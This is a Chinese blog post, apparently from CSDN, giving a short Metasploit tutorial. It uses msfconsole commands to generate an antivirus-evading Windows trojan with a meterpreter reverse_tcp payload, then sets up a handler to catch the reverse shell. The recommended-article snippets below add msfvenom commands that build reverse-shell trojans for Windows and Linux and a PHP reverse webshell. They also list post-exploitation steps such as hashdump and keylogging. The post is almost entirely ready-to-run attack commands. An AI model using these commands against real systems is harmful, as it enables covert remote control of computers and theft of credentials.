metasploit简单使用-生成木马反弹shell连接

最新推荐文章于 2024-05-13 14:29:04 发布
最新推荐文章于 2024-05-13 14:29:04 发布
阅读量2.3k 收藏 8
点赞数 2
分类专栏: Linux汇编和Shellcoding
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingkongtianyuzhao/article/details/104118441
版权

metasploit简单使用
在Kali中运行msfconsole,运行下列命令生成test.exe木马

use evasion/windows/windows_defender_exe
set filename test.exe
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.11
set lport 5555
exploit

生成test.exe,放在靶机中,然后继续在Kali中运行下列命令,监听tcp反弹连接

back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.11
set lport 5555
exploit

在靶机中运行test.ext,
在Kali中会看到反弹的连接:
在这里插入图片描述

星空你好
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹木马原理_Metasploit -- 木马生成原理和方法
weixin_39986027的博客
12-22 1104
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。---- 网易云热评一、生成方式:利用msf模块中的msfvenom模块二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标...
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4386
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
复现|使用Kali生成木马,渗透Windows系统
最新发布
Maricopig的博客
05-13 947
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
msf反弹shell
qq_41232519的博客
08-14 676
文章目录一、生成木马二、执行监听三、上传并执行木马 一、生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.159.128,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
云服务器msf跨域反弹shell
iuyoo的博客
03-29 5978
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成木马上传进被攻击机内,这里放
利用Metasploit获取linux反弹shell的尝试
weixin_42324313的博客
08-19 9653
序 接《Metasploit使用RPC方式复现一个Linux提权漏洞》。 由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit使用RPC方式复现一个Linux提权漏洞。 还需要继续进行探索,具体什么...
metasploit-framework-master.zip
09-08
1. **信息收集**:使用Metasploit的扫描模块,如端口扫描和漏洞扫描,收集目标网络和系统的详细信息。 2. **漏洞识别**:基于收集到的信息,选择合适的exploit模块,针对发现的漏洞进行攻击。 3. **payload配置**...
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
metasploit-framework-6.3.34.zip
09-17
2. 社会工程学工具:Metasploit还包含了社会工程学工具,如钓鱼邮件生成器,用于模拟真实世界的攻击场景,测试用户的安全意识。 3. 反取证:框架内的反取证模块可以帮助研究人员了解攻击者可能采取的隐藏手段,以...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单使用...
metasploit-framework-6.3.34.tar.gz
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework 是一款著名的开源安全工具,广泛应用于网络安全测试和漏洞利用。这个6.3.34版本的压缩包“metasploit-framework-6.3.34.tar.gz”包含了该...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
反弹shell提权linux,【我i原创】Metasploit反弹shell + 嗅探 + 域提权
weixin_42498641的博客
05-13 280
[size=13.3333px]sessions -i 1 //打开建立的第一个会话getuid //查看UIDsysinfo //查看攻击主机的系统信息run hashdump //dump目标主机的hash帐号信息,备份进行暴破ps //查看目标主机进程migrate 1576(pid) //切换自己为管理员,1576是管理员的进程IDgetuidkeyscan_start //开启健盘记录功...
反弹shell提权linux,当Linux提权不能反弹Shell时利用metasploit进行提权
weixin_42495394的博客
05-13 409
当LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..1 .生成WEBSHELL文件msf > msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R > dis9.php我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行把dis9.php传进你的SHELL里 例如 www.dis9.com/dis9.php2 . 然...
metasploit、msfvenom生成木马入侵电脑及手机
xj28555的博客
08-09 1547
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有--payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞
使用msf进行反弹shell+内网渗透
热门推荐
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6866
生成木马进行植入
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
Metasploit和Cobalt Strike生成木马的过程
03-25
使用Metasploit生成木马,需要首先启动控制台,然后选择木马生成模块。可以使用“msfconsole”命令启动控制台,然后使用“search”命令搜索木马生成模块。 步骤2:配置木马生成参数 选择木马生成模块后,需要配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值